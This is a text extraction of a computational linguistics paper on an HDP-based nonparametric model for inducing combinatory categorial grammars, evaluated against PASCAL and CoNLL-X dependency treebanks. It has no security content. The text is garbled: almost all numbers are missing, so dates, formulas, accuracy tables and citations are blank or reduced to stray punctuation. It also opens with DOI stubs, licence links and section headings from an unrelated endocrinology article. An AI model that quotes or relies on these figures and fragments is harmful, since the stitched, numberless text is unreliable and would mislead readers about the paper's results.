. . .x https://doi.org/ . /j. - . . .x https://doi.org/ . /jc. - https://doi.org/ . / - . https://doi.org/ . /eje. . https://doi.org/ . /eje. . https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction patients and methods patients methods hormonal assays statistical analyses ethical approval results discussion limitation conclusion declaration of interest funding author contribution statement acknowledgments references transactions of the association for computational linguistics, ( ) – . action editor: sharon goldwater. submitted / ; revised / ; published / . c© association for computational linguistics. an hdp model for inducing combinatory categorial grammars yonatan bisk and julia hockenmaier department of computer science the university of illinois at urbana-champaign n goodwin ave urbana, il {bisk ,juliahmr}@illinois.edu abstract we introduce a novel nonparametric bayesian model for the induction of combinatory cat- egorial grammars from pos-tagged text. it achieves state of the art performance on a number of languages, and induces linguisti- cally plausible lexicons. introduction what grammatical representation is appropriate for unsupervised grammar induction? initial attempts with context-free grammars (cfgs) were not very successful (carroll and charniak, ; charniak, ). one reason may be that cfgs require the specification of a finite inventory of nonterminal cat- egories and rewrite rules, but unless one adopts lin- guistic principles such as x-bar theory (jackendoff, ), these nonterminals are essentially arbitrary labels that can be combined in arbitrary ways. while further cfg-based approaches have been proposed (clark, ; kurihara and sato, ), most re- cent work has followed klein and manning ( ) in developing models for the induction of projec- tive dependency grammars. it has been shown that more sophisticated probability models (headden iii et al., ; gillenwater et al., ; cohen and smith, ) and learning regimes (spitkovsky et al., ), as well as the incorporation of prior lin- guistic knowledge (cohen and smith, ; berg- kirkpatrick and klein, ; naseem et al., ) can lead to significant improvement over klein and manning’s baseline model. the use of dependency grammars circumvents the question of how to obtain an appropriate inventory of categories, since depen- dency parses are simply defined by unlabeled edges between the lexical items in the sentence. but de- pendency grammars make it also difficult to cap- ture non-local structures, and blunsom and cohn ( ) show that it may be advantageous to refor- mulate the underlying dependency grammar in terms of a tree-substitution grammar (tsg) which pairs words with treelets that specify the number of left and right dependents they have. in this paper, we explore yet another option: instead of dependency grammars, we use combinatory categorial gram- mar (ccg, steedman ( ; )), a linguistically expressive formalism that pairs lexical items with rich categories that capture all language-specific in- formation. this may seem a puzzling choice, since ccg requires a significantly larger inventory of cat- egories than is commonly assumed for cfgs. how- ever, unlike cfg nonterminals, ccg categories are not arbitrary symbols: they encode, and are deter- mined by, the basic word order of the language and the number of arguments each word takes. ccg is very similar to tsg in that it also pairs lexical items with rich items that capture all language-specific in- formation. like tsg and projective dependency grammars, we restrict ourselves to a weakly context- free fragment of ccg. but while tsg does not dis- tinguish between argument and modifier dependen- cies, ccg makes an explicit distinction between the two. and while the elementary trees of blunsom and cohn ( )’s tsg and their internal nodel la- bels have no obvious linguistic interpretation, the syntactic behavior of any ccg constituent can be directly inferred from its category. to see whether the algorithm has identified the basic syntactic prop- erties of the language, it is hence sufficient to in- spect the induced lexicon. conversely, boonkwan and steedman ( ) show that knowledge of these basic syntactic properties makes it very easy to cre- ate a language-specific lexicon for accurate unsu- pervised ccg parsing. we have recently proposed an algorithm for inducing ccgs (bisk and hocken- maier, b) that has been shown to be competitive with other approaches even when paired with a very simple probability model (gelling et al., ). in this paper, we pair this induction algorithm with a novel nonparametric bayesian model that is based on a different factorization of ccg derivations, and show that it outperforms our original model and many other approaches on a large number of lan- guages. our results indicate that the use of ccg yields grammars that are significantly more robust when dealing with longer sentences than most de- pendency grammar-based approaches. combinatory categorial grammar combinatory categorial grammar (steedman, ) is a linguistically expressive, lexicalized grammar formalism that associates rich syntactic types with words and constituents. for simplicity, we restrict ourselves to the standard two atomic types s (sentences) and n (encompassing both nouns and noun phrases) from which we recursively build categories. complex categories are of the form x/y or x\y, and represent functions which return a result of type x when combined with an argument of type y. the directionality of the slash indicates whether the argument precedes or follows the functor. we write x|y when the direction of the slash does not matter. the ccg lexicon encodes all language-specific information. it pairs every word with a set of cate- gories that define both its specific syntactic behavior as well as the overall word order of the language: n: {he, girl, lunch, ...} n/n: {good, the, eating, ...} s\n: {sleeps, ate, eating, ...} (s\n)/n: {sees, ate, ...} s\s: {quickly, today...} (s\n)/(s\n): {good, the, ...} to draw a simple contrast, in spanish we would expect adjectives to take the category n\n because spanish word ordering dictates that the adjective fol- low the noun. the lexical categories also capture word-word dependencies: head-argument relations are captured by the lexical category of the head (e.g. (s\n)/n), whereas head-modifier relations are cap- tured by the lexical category of the modifier, which is of the form x\x or x/x, and may take further arguments of its own. our goal will be to automati- cally learn these types of lexicons for a language. in figure , we juxtapose several such lexicons which were automatically discovered by our system. the rules of ccg are defined by a small set of of combinatory rules, which are traditionally writ- ten as schemas that define how constituents can be combined in a bottom-up fashion (although genera- tive probability models for ccg view them in a top- down manner, akin to cfg rules). the first, and most obvious, of these rules is function application: x/y y ⇒ x (b >) y x\y ⇒ x (b <) here the functor x/y or x\y is applied to an argument y resulting in x. while standard ccg has a number of additional combinatory rules (type- raising, generalized variants of composition and substitution) that increase its generative capacity be- yond context-free grammars and allow an elegant treatment of non-local dependencies arising in ex- traction, coordination and scrambling, we follow bisk and hockenmaier ( b) and use a restricted fragment, without type-raising, that allows only ba- sic composition and is context-free: x/y y/z ⇒ x/z (b > ) x/y y\z ⇒ x\z (b x>) y\z x\y ⇒ x\z (b < ) y/z x\y ⇒ x/z (b x<) the superscript denotes the arity of the compo- sition which is too low to recover non-projective de- pendencies, and our grammar is thus weakly equiva- lent to the dependency grammar representations that are commonly used for grammar induction. the main role of composition in our fragment is that it allows sentential and verb modifiers to both take cat- egories of the form s\s and s/s. composition in- troduces spurious ambiguities, which we eliminate by using eisner ( )’s normal form. coordinating conjunctions have a special cate- gory conj, and we binarize coordination as follows (hockenmaier and steedman, ): x x[conj] ⇒& x (& ) conj x ⇒& x[conj] (& ) category induction unlike dependency grammars, ccg requires an in- ventory of lexical categories. given a set of lexical categories, the combinatory rules define the set of parses for each sentence. we follow the algorithm proposed by bisk and hockenmaier ( b) to au- tomatically induce these categories. the lexicon is initialized by pairing all nominal tags (nouns, pro- nouns and determiners) with the category n, all verb tags with the category s, and coordinating conjunc- tions with the category conj: conj → conj det, noun, num, pron → n verb → s although our lexicons are defined over corpus- specific pos tags, we use a slightly modified version of petrov et al. ( )’s universal pos tagset to cat- egorize them into these broad classes. the primary changes we make to their mappings are the addition of a distinction (where possible) between subordi- nating and coordinating conjunctions and between main and auxiliary verbs . since the initial lexicon consists only of atomic categories, it cannot parse any complex sentences: the man ate quickly dt nns vbd rb - n s - complex lexical categories are induced by con- sidering the local context in which tokens appear. given an input sentence, and a current lexicon which assigns categories to at least some of the tokens in the sentence, we apply the following two rules to add new categories to the lexicon: the argument rule allows any lexical tokens that have categories other than n and conj to take immediately adjacent the normal-form of hockenmaier and bisk ( ) is not required for this fragment of ccg. this distinction was suggested by the authors (p.c.) ns as arguments. the modifier rule allows any to- ken (other than coordinating conjunctions that ap- pear in the middle of sentences) to modify an imme- diate neighbor that has the category s or n or is a modifier (s|s or n|n) itself. the man ate quickly dt nns vbd rb n/n n, s/s s, n\n s\s s\n these rules can be applied iteratively to form more complex categories. we restrict lexical cate- gories to a maximal arity of , and disallow the cat- egory (s/n)\n, since it is equivalent to (s\n)/n. the man ate quickly dt nns vbd rb n/n, n, s/s s, n\n, s\s, (s/s)/(s/s)(n\n)/(n\n) s\n (n\n)\(n\n) (n/n)\(n/n) (s/s)\(s/s) (s\s)/(s\s) the resultant, overly general, lexicon is then used to parse the training data. each complete parse has to be of category s or n, with the constraint that sentences that contain a main verb can only form parses of category s. a new probability model for ccg generative models define the probability of a parse tree τ as the product of individual rule probabili- ties. our previous work (bisk and hockenmaier, b) uses the most basic model of hockenmaier and steedman ( ), which first generates the head direction (left, right, unary, or lexical), followed by the head category, and finally the sister category. this factorization does not take advantage of the unique functional nature of ccg. we therefore in- troduce a new factorization we call the argument model. it exploits the fact that ccg imposes strong constraints on a category’s left and right children, since these must combine to create the parent type via one of the combinators. in practice this means that given the parent x/z, the choice of combinator c and an argument y we can uniquely determine the categories of the left and right children: huang et al. ( ) present a (deficient) variant and bayesian extension of the bisk and hockenmaier ( b) model without k-best smoothing that both underperform our published results. if x is an atomic category, only application is possible. parent c ⇒ left right x/z b > (x/z)/y y b < y (x/z)\y b > x/y y/z b < y/z x\y and correspondingly for x\z: parent c ⇒ left right x\z b > (x\z)/y y b < y (x\z)\y b > x/y y\z b < y\z x\y while type-changing and raising are not used in this work the model’s treatment of root productions extends easily to handle these other unary cases. we simply treat the argument y as the unary outcome so that the parent, combinator and argument uniquely specify every detail of the unary rule: parent c ⇒ y top top ∈{s,n} s/(s\n) t< n s\(s/n) t> n we still distinguish the same rule types as before (lexical, unary, binary with head left/right), leading us to the following model definition: given: p := x/z where type(t) ∈{left,right,unary,lex} p(t|p) × { p(w|p, t) lex p(y|p, t) ×p(c|p, t,y) o.w. argument combinator note that this model generates only one ccg cat- egory but uniquely defines the two children of a par- ent node. we will see below that this greatly simpli- fies the development of non-parametric extensions. hdp-ccg: a nonparametric model simple generative models such as pcfgs or bisk and hockenmaier ( b)’s ccg model are not robust in the face of sparsity, since they assign zero probability to any unseen event. sparsity is a particular problem for formalisms like ccg that have a rich inventory of object types. nonpara- metric bayesian models, e.g. dirichlet processes (teh, ) or their hierarchical variants (teh et al., ) and generalizations (teh, ) overcome this problem in a very elegant manner, and are used by many state-of-the-art grammar induction systems (naseem et al., ; blunsom and cohn, ; boonkwan and steedman, ). they also im- pose a rich-getting-richer behavior that seems to be advantageous in many modeling applications. by contrast, bisk and hockenmaier ( b) propose a weighted top-k scheme to address these issues in an ad-hoc manner. the argument model introduced above lends it- self particularly well to nonparametric extensions such as the standard hierarchical dirichlet pro- cesses (hdp). in this work the size of the grammar and the number of productions are fixed and small, but we present the formulation as infinite to allow for easy extension in the future. specifically, this frame- work allows for extensions which grow the grammar during parsing/training or fully lexicalize the pro- ductions. additionally, while our current work uses only a restricted fragment of ccg that has only a finite set of categories, the literature’s generalized variants of composition make it possible to gener- ate categories of unbounded arity. we therefore be- lieve that this is a very natural probabilistic frame- work for ccg, since hdps make it possible to con- sider a potentially infinite set of categories that can instantiate the y slot, while allowing the model to capture language-specific preferences for the set of categories that can appear in this position. the hdp-ccg model in bayesian models, multinomials are drawn from a corresponding n- dimensional dirichlet distribution. the dirichlet process (dp) generalizes the dirichlet distribution to an infinite number of possible outcomes, allowing us to deal with a potentially infinite set of categories or words. dps are defined in terms of a base dis- tribution h that corresponds to the mean of the dp, and a concentration or shape parameter α. in a hi- erarchical dirichlet process (teh et al., ), there is a hierarchy of dps, such that the base distribution of a dp at level n is a dp at level n− . the hdp-ccg (figure ) is a reformulation of the argument model introduced above in terms of hierarchical dirichlet processes. at the heart of the model is a distribution over ccg categories. by combining a stick breaking process with a multino- mial over categories we can define a dp over ccg an alternative hdp model for semantic parsing with ccg is proposed by kwiatkowski et al. ( ). hdp-ccg ) draw global parameters define mle root parameter θtop draw top-level symbol weights βy ∼ gem(αy ) draw top-level lexical weights βl ∼ gem(αl) for each grammar symbol z ∈{ , , ...}: define mle rule type parameters θtz draw argument parameters φyz ∼ dp(αy,βy ) draw lexical emission parameters φlz ∼ dp(αl,βl) for each grammar symbol y ∈{ , , ...}: define mle combinator parameters θcz,y ) for each parse tree: generate root node ztop ∼ binomial(θtop ) for each node i in the parse tree: choose rule type ti ∼ multinomial(θtzi ) if ti == lex: emit terminal symbol xi ∼ multinomial(φlzi ) if ti == left/right/unary: generate argument category yi ∼ multinomial(φyzi ) generate combinator ci ∼ multinomial(θczi,yi ) deterministically create zl(i) (and zr(i) if binary) zi yi ci zl(i) zr(i) xl(i) xr(i) z ∞ ∞y φy θt θc φl βy βl because we are working with ccg, the parent zi, argument yi and combinator ci uniquely define the two children categories (zl(i),zr(i)). the dashed arrows here rep- resent the deterministic process used to generate these two categories. figure : the hdp-ccg has two base distributions, one over the space of categories and the other over words (or tags). for every grammar symbol, an argument distribution and emission distribution is drawn from the corresponding dirichlet processes. in addition, there are several mle distributions tied to a given symbol for generating rule types, combinators and lexical tokens. categories whose stick weights (βy ) correspond to the frequency of the category in the corpus. next we build the hierarchical component of our model by choosing an argument distribution (φy ), again over the space of categories, for every parent x/z. this argument distribution is drawn from the previously defined base dp, allowing for an important level of parameter tying across all argument distributions. while the base dp does define the mean around which all argument distributions are drawn, we also require a notion of variance or precision which de- termines how similar individual draws will be. this precision is determined by the magnitude of the hy- perparameter αy . this hierarchy is paralleled for lexical productions which are drawn from a unigram base dp over terminal symbols controlled by αl. for simplicity we use the same scheme for setting the values for αl as αy . we present experimen- tal results in which we vary the value of αy as a function of the number of outcomes allowed by the grammar for argument categories or the corpus in the case of terminal symbols. specifically, we set αy = np for conditioning contexts with n out- comes. since liang et al. ( ) found that the ideal value for alpha appears to be superlinear but sub- quadratic in n, we present results where p takes the values , . , . , and . to explore the range from uniform to quadratic. this setting for α is the only free parameter in the model. by controlling preci- sion we can tell the model to what extent global cor- pus statistics should be trusted. we believe this has a similar effect to bisk and hockenmaier ( b)’s top-k upweighting and smoothing scheme. one advantage of the argument model is that it only requires a single distribution over categories for each binary tree. in contrast to similar proposals for cfgs (liang et al., ), which impose no formal restrictions on the nonterminals x, y, z that can ap- pear in a rewrite rule x → y z, this greatly sim- plifies the modeling problem (yielding effectively a model that is more akin to nonparametric hmms), since it avoids the need to capture correlations be- tween different base distributions for y and z. variational inference hdps need to be estimated with approximate techniques. as an alternative to gibbs sampling (teh et al., ), which is exact, but typically very slow and has no clear convergence criteria, variational inference algorithms (bishop, ; blei and jordan, ) estimate the parame- ters of a truncated model to maximize a lower bound of the likelihood of the actual model. this allows for factorization of the model and a training procedure analogous to the inside-outside algorithm (lari and young, ), allowing training to run very quickly and in a trivially parallelizable manner. to initialize the base dp’s stick weights, we fol- low the example of kurihara et al. ( ) and use an mle model initialized with uniform distributions to compute global counts for the categories in our grammar. when normalized these provide a better initialization than a uniform set of weights. updates to the distributions are then performed in a coordi- nate descent manner which includes re-estimation of the base dps. in variational inference, multinomial weights w take the place of probabilities. the weights for an outcome y with conditioning variable p are com- puted by summing pseudocounts with a scaled mean vector from the base dp. the computation involves moving in the direction of the gradient of the dirich- let distribution which results in the following differ- ence of digammas (Ψ): wp (y ) = Ψ(c(p,y ) + α p βy ) − Ψ(c(p,∗) + αp ) importantly, the digamma and multinomial weights comprise a righ-get-richer scheme, biasing the model against rare outcomes. in addition, since variational inference is done by coordinate descent, it is trivially parallelizeable. in practice, training and testing our models on the corpora containing sen- tences up to length used in this paper takes be- tween one minute to at most three hours on a single -core machine depending on their size. evaluation as is standard for this task, we evaluate our systems against a number of different dependency treebanks, and measure performance in terms of the accuracy of directed dependencies (i.e. the percentage of words in the test corpus that are correctly attached). we use the data from the pascal challenge for grammar induction (gelling et al., ), the data from the conll-x shared task (buchholz and marsi, ) and goldberg ( )’s hebrew corpus. converting ccg derivations into dependencies is mostly straightforward, since the ccg derivation identifies the root word of each sentence, and head- argument and head-modifier dependencies are easily read off of ccg derivations, since the lexicon de- fines them explicitly. unlike dependency grammar, ccg is designed to recover non-local dependencies that arise in control and binding constructions as well as in wh-extraction and non-standard coordi- nation, but since this requires re-entrancies, or co- indexation of arguments (hockenmaier and steed- man, ), within the lexical categories that trigger these constructions, our current system returns only local dependencies. but since dependency gram- mars also captures only local dependencies, this has no negative influence on our current evaluation. however, a direct comparison between depen- dency treebanks and dependencies produced by ccg is more difficult (clark and curran, ), since dependency grammars allow considerable freedom in how to analyze specific constructions such as verb clusters (which verb is the head?) prepositional phrases and particles (is the head the noun or the preposition/particle?), subordinating conjunctions (is the conjunction a dependent of the head of the main clause and the head of the embed- ded clause a dependent of the conjunction, or vice versa?) and this is reflected in the fact that the tree- banks we consider often apply different conventions for these cases. although remedying this issue is beyond the scope of this work, these discrepancies very much hint at the need for a better mechanism to evaluate linguistically equivalent structures or tree- bank standardization. the most problematic construction is coordina- tion. in standard ccg-to-dependency schemes, both conjuncts are independent, and the conjunction itself is not attached to the dependency graph, whereas de- pendency grammars have to stipulate that either one of the conjuncts or the conjunction itself is the head, with multiple possibilities of where the remaining constituents attach. in addition to the standard ccg scheme, we have identified five main styles of con- junction in our data (figure ), although several cor- pora distinguish multiple types of coordinating con- junctions which use different styles (not all shown here). since our system has explicit rules for coordi- nation, we transform its output into the desired target representation that is specific to each language. experiments we evaluate our system on different languages. in each case, we follow the test and training regimes that were used to obtain previously published results in order to allow a direct comparison. we com- pare our system to the results presented at the pas- cal challenge on grammar induction (gelling et al., ) , as well as to gillenwater et al. ( ) and naseem et al. ( ). we use nivre ( )’s penn malt implementation of collins ( )’s head rules to translate the wsj penn treebank (marcus et al., ) into dependencies. finally, when train- ing the mle version of our model we use a simple smoothing scheme which defines a small rule proba- bility (e− ) to prevent any rule used during training from going to zero. . pascal challenge on grammar induction in table , we compare the performance of the ba- sic argument model (mle), of our hdp model with four different settings of the hyperparameters (as ex- plained above) and of the systems presented in the pascal challenge on grammar induction (gelling et al., ). the systems in this competition were instructed to train over the full dataset, including the unlabelled test data, and include bisk and hocken- maier ( a)’s ccg-based system (bh) to cohn et al. ( )’s reimplementation of klein and manning ( )’s dmv model in a tree-substitution gram- mar framework (bc), as well as three other de- pendency based systems which either incorporate naseem et al. ( )’s rules in a deterministic fash- ion (søgaard, ), rely on extensive tuning on numbers are from personal correspondence with the orga- nizers. the previously published numbers are not comparable to literature due to an error in the evaluation. http://wiki. cs.ox.ac.uk/inducinglinguisticstructure/ resultsdepcomparable the development set (tu, ) or incorporate mil- lions of additional tokens from wikipedia to esti- mate model parameters (marecek and zabokrtsky, ). we ignore punctuation for all experiments reported in this paper, but since the training data (but not the evaluation) includes punctuation marks, participants were free to choose whether to include punctuation or ignore it. while bh is the only other system with directly interpretable linguistic output, we also include a di- rect comparison with bc, whose tsg representa- tion is equally expressive to ours. finally we present a row with the maximum performance among the other three models. as we have no knowledge of how much data was used in the training of other sys- tems we simply present results for systems trained on length (not including punctuation) sentences and then evaluated at lengths and . the mle version of our model shows rather vari- able performance: although its results are particu- larly bad on basque (eu), it outperforms both bh and bc on some other settings. by contrast, the hdp system is always better than the mle model. it outperforms all other systems on half of the cor- pora. on average, it outperforms bh and bc by . % and . % on length , or . % and . % on length respectively. the main reason why our system does not outperform bc by an even higher margin is the very obvious . %/ . % deficit on slovene. however, the slovene dependency tree- bank seems to follow a substantially different anno- tation scheme. in particular, the gold standard an- notation of the , sentences in the slovene de- velopment set treats many of them as consisting of independent sentences (often separated by punctua- tion marks that our system has no access to), so that the average number of roots per sentence is . : >> “ verjeti believe ti i , , 〈〈 ” je is mehko soft rekla said when our system is presented with these short components in isolation, it oftentimes analyzes them correctly, but since it has to return a tree with a sin- gle root, its performance degrades substantially. we believe the hdp performs so well as com- pared to the mle model because of the influence of the shared base distribution, which allows the ar, eu, cs, nl, wsj, ch, he da, he es, bg, de, pt sv, sl ja noun conj noun noun conj noun noun conj noun noun conj noun noun conj noun figure : in the treebanks used for evaluation different standards exist for annotating coordination. while not exhaustive, this table demonstrates five of the most common schemes used in the literature. syntactically these are identical and traditionally ccg draws arcs only to the arguments without attaching the conjunction. for the purposes of comparison with the literature we have implemented these five translation schemes. arabic danish slovene swedish dutch basque portuguese wsj childes czech # tokens , , , , , , , , , , # tags pa sc a l bc . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . max . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . bh . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . t hi s w or k mle . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . hdp . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . hdp . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . hdp . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . hdp . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . +/− - . /- . + . /+ . - . /- . + . /+ . + . /+ . - . /- . + . /+ . - . /- . + . /+ . - . /- . table : a comparison of the basic argument model (mle) and four hyper-parameter settings of the hdp- ccg against two syntactic formalisms that participated in the pascal challenge (gelling et al., ), bh (bisk and hockenmaier, a) and bc (blunsom and cohn, ), in addition to a max over all other participants. we trained on length data (punctuation removed), including the test data as recommended by the organizers. the last row indicates the difference between our best system and the competition. global category distribution to influence each of the more specific distributions. further, it provides a very simple knob in the choice of hyperparame- ters, which has a substantial effect on performance. a side effect of the hyperparameters is that their strength also determines the rate of convergence. this may be one of the reasons for the high vari- ance seen in the four settings tested, although we note that since our initialization is always uniform, and not random, consecutive runs do not introduce variance in the model’s performance. . comparison with systems that capture linguistic constraints since our induction algorithm is based on the knowl- edge of which pos tags are nouns and verbs, we compare in table our system to naseem et al. ( ), who present a nonparametric dependency model that incorporates thirteen universal linguistic constraints. three of these constraints correspond to our rules that verbs are the roots of sentences and may take nouns as dependents, but the other ten con- straints (e.g. that adjectives modify nouns, adverbs modify adjectives or verbs, etc.) have no equivalent in our system. although our system has less prior knowledge, it still performs competitively. on the wsj, naseem et al. demonstrate the im- portance and effect of the specific choice of syntactic rules by comparing the performance of their system with hand crafted universal rules ( . ), with en- glish specific rules ( . ), and with rules proposed by druck et al. ( ) ( . ). the performance of naseem et al.’s system drops very significantly as sentence length (and presumable parse complexity) sl es da pt sv ∼#tokens . k . k . k k k n . . . . . hdp . . . . . table : a comparison of our system with naseem et al. ( ), both trained and tested on the length training data from the conll-x shared task. increases, whereas our system shows significantly less decline, and outperforms their universal system by a significant margin. ≤ ≤ naseem universal rules . . naseem english rules . . hdp-ccg . . hdp-ccg (train ≤ ) . in contrast to spitkovsky et al. ( ), who reported that performance of their dependency based system degrades when trained on longer sentences, our per- formance on length sentences increases to . when we train on sentences up to length . another system that is also based on ccg, but captures significantly more linguistic knowledge than ours, was presented by boonkwan and steed- man ( ), who achieve an accuracy of . on wsj section (trained on sections - ). us- ing the same settings, our system achieves an accu- racy of . . unlike our approach, boonkwan and steedman do not automatically induce an appropri- ate inventory of lexical category, but use an exten- sive questionnaire that defines prototype categories for various syntactic constructions, and requires sig- nificant manual engineering of which pos tags are mapped to what categories to generate a language- specific lexicon. however, their performance de- grades significantly when only a subset of the ques- tions are considered. using only the first ques- tions, covering facts about the ordering of subjects, verbs and objects, adjectives, adverbs, auxiliaries, adpositions, possessives and relative markers, they achieve an accuracy of . , which is almost iden- our earlier generative model showed similar behavior, al- though the results in bisk and hockenmaier ( b) are not directly comparable due to differences in the data. sl es da pt sv #tokens , , , , , g . . . . . hdp . . . . . bg wsj nl ja de #tokens , , , , , g . . . . . hdp . . . . . table : a comparison of our system with gillenwa- ter et al. ( ), both trained on the length train- ing data, and tested on the length test data, from the conll-x shared task. tical to ours, even though we use significantly less initial knowledge. however, the lexicons we present below indicate that we are in fact learning many of the very exact details that in their system are con- structed by hand. the remaining questions in boonkwan and steedman’s questionnaire cover less frequent phenomena such as the order of negative markers, dative shift, and pro-drop. the obvious ad- vantage of this approach is that this allows them to define a much more fine-grained inventory of lexical categories than our system can automatically induce. we also stipulate that for certain languages knowl- edge of pro-drop could play a significant role in the success of their approach: if complete sentences are allowed to be of the form s\n or s/n, the same lex- ical category can be used for the verb regardless of whether the subject is present or has been dropped. . additional languages in order to provide results on additional languages, we present in table a comparison to the work of gillenwater et al. ( ) (g ), using the conll-x shared task data (buchholz and marsi, ). fol- lowing gillenwater et al., we train only on sentences of length from the training set and evaluate on the test set. since this is a different training regime, and these corpora differ for many languages from that of the pascal challenge, numbers from table can- not be compared directly with those in table . we have also applied our model to goldberg ( )’s hebrew corpus, where it achieves an accuracy of . (trained and tested on all sentences length ; , ) and . (length ; , tokens). arabic % swedish % wsj % childes % japanese % czech % verb (s\n)/n s s\n s/n s s (s/n)/n s\n (s\n)/n s s\n adp n\n (s\s)/n (s\s)/n (s\s)/n (s/s)\n (s\s)/n n/n (n\n)/n (n\n)/n n/n n\n (s/s)/n noun n\n n n n n n n n/n adj n\n n/n n/n n/n s/s n/n figure : partial lexicons demonstrating language specific knowledge learned automatically for five lan- guages. for ease of comparison between languages, we use the universal tag label (verb, adposition, noun and adjective). shown are the most common categories and the fraction of occurrences of the tag that are assigned this category (according to the viterbi parses). the induced lexicons since our approach is based on a lexicalized for- malism such as ccg, our system automatically in- duces lexicons that pair words (or, in our case, pos- tags) with language-specific categories that capture their syntactic behavior. if our approach is success- ful, it should learn the basic syntactic properties of each language, which will be reflected in the corre- sponding lexicon. in figure one sees how verbs subcategorize differently, how word ordering differs by language, and how the attachment structures of prepositions are automatically discovered and differ across languages. in arabic, for example, the sys- tem learns that word order is variable and therefore the verb must allow for both svo and vos style constructions. we generally learn that adpositions (prepositions or postpositions) take nouns as argu- ments. in czech, pps can appear before and after the verb, leading to two different categories ((s\s)/n and (s/s)/n). japanese has postpositions that ap- pear in preverbal position ((s/s)\n), but when this category is assigned to nominal particles that cor- respond to case markers, it effectively absorbs the noun, leading to a preference for verbs that do not take any arguments (s), and to a misanalysis of ad- jectives as verb modifiers (s/s). our lexicons also reflect differences in style: while childes and the wsj are both english, they represent very different registers. we learn that subjects are mostly absent in the informal speech and child-directed instructions contained in childes, while effectively mandatory in the wall street journal. conclusions this paper has introduced a novel factorization for ccg models and showed how when combined with non-parametric bayesian statistics it can compete with every other grammar induction system cur- rently available, including those that capture a sig- nificant amount of prior linguistic knowledge. the use of a powerful syntactic formalism proves ben- eficial both in terms of requiring very limited uni- versal knowledge and robustness at longer sentence lengths. unlike standard grammar induction sys- tems that are based on dependency grammar, our system returns linguistically interpretable lexicons for each language that demonstrate it has discov- ered their basic word order. of particular note is the simplicity of the model both algorithmically and in terms of implementation. by not faltering on longer sentences or requiring extensive tuning, the system can be easily and quickly deployed on a new lan- guage and return state of the art performance and easily interpretable lexicons. in this paper, we have applied this model only to a restricted fragment of ccg, but future work will address the impact of lex- icalization and the inclusion of richer combinators. acknowledgements this work is supported by nsf career award (bayesian models for lexicalized gram- mars). references taylor berg-kirkpatrick and dan klein. . phyloge- netic grammar induction. in proceedings of the th annual meeting of the association for computational linguistics, pages – , uppsala, sweden, july. christopher bishop. . pattern recognition and ma- chine learning. springer-verlag, august. yonatan bisk and julia hockenmaier. a. induction of linguistic structure with combinatory categorial grammars. in naacl hlt workshop on induction of linguistic structure, pages – , montréal, canada, june. yonatan bisk and julia hockenmaier. b. simple robust grammar induction with combinatory cate- gorial grammars. in proceedings of the twenty-sixth conference on artificial intelligence (aaai- ), pages – , toronto, canada, july. david m blei and michael i jordan. . variational methods for the dirichlet process. in proceedings of the twenty-first international conference on machine learning (icml ), banff, alberta, canada, july. phil blunsom and trevor cohn. . unsupervised induction of tree substitution grammars for depen- dency parsing. proceedings of the conference on empirical methods of natural language process- ing, pages – , october. prachya boonkwan and mark steedman. . gram- mar induction from text using small syntactic proto- types. in proceedings of th international joint con- ference on natural language processing, pages – , chiang mai, thailand, november. sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proceedings of the th conference on computational natural language learning (conll-x), pages – , new york city, june. glenn carroll and eugene charniak. . two exper- iments on learning probabilistic dependency gram- mars from corpora. working notes of the workshop statistically-based nlp techniques, pages – . eugene charniak. . statistical language learning. the mit press, cambridge, massachusetts. stephen clark and james r curran. . formalism- independent parser evaluation with ccg and dep- bank. in proceedings of the th annual meeting of the association of computational linguistics, pages – , prague, czech republic, june. alex clark. . unsupervised language acquisition: theory and practice. ph.d. thesis, university of sus- sex, september. shay b cohen and noah a smith. . variational inference for grammar induction with prior knowl- edge. proceedings of the acl-ijcnlp confer- ence short papers, pages – . shay b cohen and noah a smith. . covariance in unsupervised learning of probabilistic grammars. the journal of machine learning research, pages – , november. trevor cohn, phil blunsom, and sharon goldwater. . inducing tree-substitution grammars. the journal of machine learning research, : – , november. michael collins. . head-driven statistical mod- els for natural language parsing. computational lin- guistics, ( ): – , december. gregory druck, gideon mann, and andrew mccal- lum. . semi-supervised learning of dependency parsers using generalized expectation criteria. in proceedings of the joint conference of the th an- nual meeting of the acl and the th international joint conference on natural language processing of the afnlp, pages – , suntec, singapore, au- gust. jason eisner. . efficient normal-form parsing for combinatory categorial grammar. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – , santa cruz, cali- fornia, usa, june. douwe gelling, trevor cohn, phil blunsom, and joão v graca. . the pascal challenge on grammar induction. in naacl hlt workshop on induction of linguistic structure, pages – , montréal, canada, june. jennifer gillenwater, kuzman ganchev, joão v graca, fernando pereira, and ben taskar. . sparsity in dependency grammar induction. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – , uppsala, swe- den, july. jennifer gillenwater, kuzman ganchev, joão v graca, fernando pereira, and ben taskar. . posterior sparsity in unsupervised dependency parsing. the journal of machine learning research, : – , february. yoav goldberg. . automatic syntactic processing of modern hebrew. ph.d. thesis, ben-gurion university of the negev, november. william p headden iii, mark johnson, and david mc- closky. . improving unsupervised dependency parsing with richer contexts and smoothing. in pro- ceedings of human language technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – , boulder, colorado, june. julia hockenmaier and yonatan bisk. . normal- form parsing for combinatory categorial grammars with generalized composition and type-raising. in proceedings of the rd international conference on computational linguistics (coling ), pages – , beijing, china, august. coling organizing committee. julia hockenmaier and mark steedman. . gener- ative models for statistical parsing with combinatory categorial grammar. in proceedings of th annual meeting of the association for computational lin- guistics, pages – , philadelphia, pennsylvania, usa, july. julia hockenmaier and mark steedman. . ccg- bank: a corpus of ccg derivations and dependency structures extracted from the penn treebank. com- putational linguistics, ( ): – , september. yun huang, min zhang, and chew lim tan. . improved combinatory categorial grammar induc- tion with boundary words and bayesian inference. in proceedings of the rd international conference on computational linguistics (coling ), mumbai, india, december. ray jackendoff. . x-bar syntax: a study of phrase structure. the mit press. dan klein and christopher d manning. . corpus- based induction of syntactic structure: models of de- pendency and constituency. in proceedings of the nd meeting 